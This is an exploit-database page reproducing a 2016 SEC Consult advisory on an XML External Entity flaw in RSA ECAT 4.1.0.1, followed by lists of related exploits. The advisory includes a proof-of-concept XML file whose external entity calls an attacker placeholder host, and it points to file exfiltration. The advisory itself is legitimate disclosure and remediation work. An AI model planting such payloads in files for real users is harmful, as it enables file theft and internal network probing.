Menu

Search for hundreds of thousands of exploits

"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection"

Author

Exploit author

"SEC Consult"

Platform

Exploit platform

xml

Release date

Exploit published date

2016-10-11

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
=======================================================================
              title: XML External Entity Injection (XXE)
            product: RSA Enterprise Compromise Assessment Tool (ECAT)
 vulnerable version: 4.1.0.1
      fixed version: 4.1.2.0
         CVE Number: -
             impact: Medium
           homepage: https://www.rsa.com
              found: 2016-04-27
                 by: Samandeep Singh (Office Singapore)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber threats.
With RSA's  award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities; and
ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using RSA ECAT client and thus obtain sensitive
information from the system. It is also possible to scan ports of the internal
hosts and cause DoS on the affected host.

SEC Consult recommends not to use the product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning). The vulnerability can be exploited by tricking the user of
the application to import a whitelisting file with malicious XML code.


Proof of concept:
-----------------
1) XML External Entity Injection (XXE)

The RSA ECAT client allows users to import whitelisting files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the application.

For example by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to attacker system.

===============================================================================
<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>
===============================================================================

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


Vulnerable / tested versions:
-----------------------------
The XXE vulnerability has been verified to exist in the RSA ECAT software
version 4.1.0.1 which was the latest version available at the time of
discovery.


Vendor contact timeline:
------------------------
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory


Solution:
---------
Update to version 4.1.2.0


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Singh / @2016
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-07 "Microsoft Windows mshta.exe 2019 - XML External Entity Injection" remote xml hyp3rlinx
2020-05-05 "BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection" webapps xml "Daniel Martinez Adan"
2020-02-07 "ExpertGPS 6.38 - XML External Entity Injection" webapps xml "Trent Gordon"
2020-01-22 "Citrix XenMobile Server 10.8 - XML External Entity Injection" webapps xml "Jonas Lejon"
2020-01-20 "Easy XML Editor 1.7.8 - XML External Entity Injection" local xml "Javier Olmedo"
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-12-03 "Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass" local xml hyp3rlinx
2019-12-02 "Microsoft Excel 2016 1901 - XML External Entity Injection" local xml hyp3rlinx
2019-12-02 "Visual Studio 2008 - XML External Entity Injection" local xml hyp3rlinx
Release Date Title Type Platform Author
2019-09-13 "LimeSurvey 3.17.13 - Cross-Site Scripting" webapps php "SEC Consult"
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Privilege Escalation" local hardware "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Local Root Jailbreak" local hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-09-22 "Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities" webapps php "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "GParted 0.14.1 - OS Command Execution" local linux "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected